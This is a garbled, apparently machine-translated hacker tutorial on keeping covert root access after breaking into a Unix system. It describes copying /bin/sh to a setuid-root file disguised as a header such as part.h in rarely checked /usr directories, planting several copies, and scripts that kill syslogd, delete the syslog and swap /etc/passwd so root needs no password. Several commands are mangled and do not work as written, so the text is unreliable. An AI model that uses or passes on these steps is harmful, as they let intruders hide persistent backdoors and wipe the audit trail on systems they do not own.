What is SUID shell?

SUID shell is a shell that can be run with the permission of the owner. That is to say, if the owner is root, you may execute the command as root. The attribute of a common shell file is rwxr-XR-X, the owner is root, and root reads/writes/executes the shell. Other users can only read and run the shell with their own permissions. However, if there is a shell whose file attribute is rwsr-XR-X, you can get the permission of the file owner. If the file owner is root, then, any user running this shell can control the entire system, such as adding users, modifying root passwords, and clearing logs.
Why?
This is a very easy question to answer. When you enter the system through some methods, if the system administrator has a certain level, you will soon find the problem. They usually view logs and modify the root password. You may have to say goodbye to the system. This is why SUID shell is needed. :)


How can we get SUID shell?
First, you need to be clever enough, depending on what kind of system administrator you are facing. When you use all the methods, such as password guessing, suffering root, and security vulnerability attacks, you have finally successfully obtained the root permission and quickly found a directory that is almost never used. In any case, do not place SUID shell in your home directory. A better example is the deep subdirectories under/usr, such as/usr/X11/include/X11 /. This directory will hardly contain anyone, and the system administrator will rarely check the files in it because it stores too many files. In addition, the SUID shell name should be as similar as other files as possible. For example, if the directory contains files such as sync. h and shape. H, SUID shell can obtain the name of part. H which is concealed.
Another good thing is to place SUID shell with other SUID programs, such as/usr/sbin, with a hidden name.

Then, create the SUID Shell under these directories. For example:

CP/bin/sh/usr/X11/include/X11/extensions/part. h
Chmod 4755/usr/X11/include/X11/extensions/part. h
Note: In order to make the entire process complete in the shortest time, you should make appropriate preparations before entering the system. It is best to carefully study the system and plan before attempting an attack. In addition, several SUID shells are always created, so that even if one of them is found, there is still a chance to control the system by using other SUID shells.


How to use SUID shell?

In many systems, the shell that users can use is often restricted. You only need to check the corresponding files in/etc. In Linux, this file is/etc/shells, which lists all Shell programs. But you can use SUID shell to do anything! For example, you want to change/etc/passwd to/etc/passwd. Heh and write the following script:

#! /Usr/X11/include/X11/extensions/part. h

MV/etc/passwd. heh
Exit
(This is just an example. It is best not to do this :))
The above example seems to provide only one non-interactive program, but as long as you carefully write the script, you can also implement a virtual "interactive" program.

If you still want to get interactive access, read the following content.

Copy/etc/passwd to the main directory and edit it to delete the root encrypted password. Enter "PS ax | grep syslog/'to obtain the syslogd process number. Run the following script in the format of/'interactive XX/'(XX is the syslogd process number:

#! /Usr/X11/include/X11/extensions/part. h

Kill-9 $1
Rm-F/var/adm/syslog
CP/etc/passwd. Old
CP ~ Backend/passwd/etc/passwd
Chmod 644/etc/passwd
Exit

Now you can become root without a password.
After completing the "work", remember to run the following script and replace it with the original password file.

#! /Usr/X11/include/X11/extensions/part. h

CP/etc/passwd. Old/etc/passwd
Chmod 644/etc/passwd
Exit